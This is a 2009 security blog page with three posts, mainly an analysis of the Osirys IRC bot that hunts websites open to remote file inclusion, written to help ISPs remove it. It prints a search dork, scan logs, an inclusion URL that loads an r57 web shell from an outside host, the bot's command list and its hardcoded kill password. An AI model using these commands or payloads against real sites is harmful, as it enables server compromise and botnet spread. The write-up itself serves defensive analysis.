SANS Paper of the Quarter Webcast!

martinse — Tue, 16 Jun 2009 00:54:18 +0000

At long last SANS and I have agreed on a date and time for me to deliver the first ever Paper of the Quarter webcast. My paper Mobile Device Forensics was picked as the Q1 2009 winner while I was away traveling South America, so I am a little late to the race. It will be held on June 24th at 1PM EDT, more information can be found here. I’ll be giving a brief overview of the paper and talking about how I analyzed a cellular phone, smartphone and MP3 player to gather data to use in a forensic investigation.

For the CISSPs reading my blog, you can probably claim CPE credits for attending the webcast, so don’t miss out!

For more information on the SANS Paper of the Quarter initiative, visit giac.org

Controlling an RFI bot – RFI pt3

martinse — Thu, 04 Jun 2009 22:50:17 +0000

Lets delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks.

First the attacker issues a command to the bot to begin scanning. The scan will search for the dork “index.php?sayfa=” which will find hosts that are vulnerable to this attack.

<[attacker]> !rfi index.php?sayfa= “index.php?sayfa=” -p 75

The bot then searches several search engines to find sites that meet the attacker’s criteria and begins trying to exploit them.

[*] RFI Scan started -> 75 sites/process
[+] Bug: index.php?sayfa=
[+] Dork: “index.php?sayfa=”
[~] >ABACHO : 0 > “index.php?sayfa=”
[~] >WEB.DE : 0 > “index.php?sayfa=”
[~] >YAHOO : 0 > “index.php?sayfa=”
[~] >ASK : 126 > “index.php?sayfa=”
[~] >ALLTHEWEB : 3084 > “index.php?sayfa=”
[~] >UOL : 390 > “index.php?sayfa=”
[~] >MSN : 2997 > “index.php?sayfa=”
[~] >ALTAVISTA : 630 > “index.php?sayfa=”
[~] >WEB.DE : 0 > “index.php?sayfa=”
[~] >GOOGLE : 0 > “index.php?sayfa=”
[~] >MSN : 3057 > “index.php?sayfa=”
[~] >ASK : 363 > “index.php?sayfa=”
[~] >UOL : 225 > “index.php?sayfa=”
[~] >VIRGILIO : 0 > “index.php?sayfa=”
[~] >LYCOS : 1731 > “index.php?sayfa=”
[~] >ABACHO : 0 > “index.php?sayfa=”
[*] >EXPLOITABLES: 4561 “index.php?sayfa=”
[+] ExPLoItIng STARTED !!

A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.

(safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???
(uname -a) Windows NT HERA 5.0 build 2195
(hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)
[+] Trying to spread ..
[%] _/ Exploiting 100 / 4561
ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.

Removal of the bot requires administrative credentials which are available in the script. Looking at the below configuration sample user “andy” may issue administrative commands to the bot.

my @admins = (“andy”);
my $killpwd = “adminpass”; #Password to Kill the Bot

Show bot commands

!help
[!] !response > Test if the RFI Response is working
[*] !chid > Change the RFI-Response
[*] !killme > KILL The Bot
[!] !milw0rm rss > Get the last Milw0rm bugs
[!] !new rfi bugs > Get the last 10 RFI bugs
[!] !new lfi bugs > Get the last 10 LFI bugs
[!] !new sql bugs > Get the last 10 SQL Injection bugs
[!] !new rce bugs > Get the last 10 RCE bugs
[!] !cari -p > Start the RFI Scanner
[!] !lfi > Start the LFI Scanner
[!] !sql -p > Start the SQL Injection Scanner
[!] !rce -p > Start the RCE Scanner
[!] !mass[rfi/lfi/sql/rce] -p > Start the Mass Scan
[*] !cmd > Gives command on the Bot’s shell. Ex: (!cmd id) (!cmd uname -a)
[*] !sspread -s > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)
[*] !admin add/remove > To add/remove a nickname to/from the admin list
[*] /msg RFI[13] !Sec ON/OFF -p > To enable or disable Security Mode
[*] /msg RFI[13] !Spread ON/OFF -p > To enable or disable Spread Mode
[!] !info > Get infos about the Bot

Gather information

!info
[i] Release : v6 -Private IrcBot
[i] Author : Attacker Nickname
[i] Contact : attacker@some.com
[i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux
[i] Uptime : 15:11:59 up 6 days, 50 min, 2 users, load average: 0.05, 0.01, 0.00
[i] Spread Mode: OFF
[i] Security Mode: OFF

Remove the bot (admin only)

!cmd rm myscan2.txt (optional step if you know the name of the bot file)
!killme
[!] Bye Bye !
* RFI[13] has quit IRC (Client exited)

Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.

This script also contains valuable investigative information in these two variables:

$auth = “attacker nickname”;
$authmail = “attacker@some.com”;

Mobile Device Forensics

martinse — Thu, 29 Jan 2009 17:43:43 +0000

While catching up on security news in an internet cafe in Buenos Aires, I came upon the news that the newly elected US president Barak Obama is going to be the first president to use a blackberry.

Article http://blog.wired.com/business/2009/01/obama-gets-to-k.html

With there being some buzz around blackberry security, it’s a good time to mention the paper I wrote for SANS on mobile device forensics.

It can be found at: http://www.sans.org/reading_room/whitepapers/forensics/mobile_device_forensics_32888?show=32888.php&cat=forensics

The paper covers how to investigate a cellular phone (Motorola Razr), smartphone (blackberry) and MP3 player to gather information, recover deleted data, etc.

Andrew Martin » Forensics

SANS Paper of the Quarter Webcast!

Controlling an RFI bot – RFI pt3

Mobile Device Forensics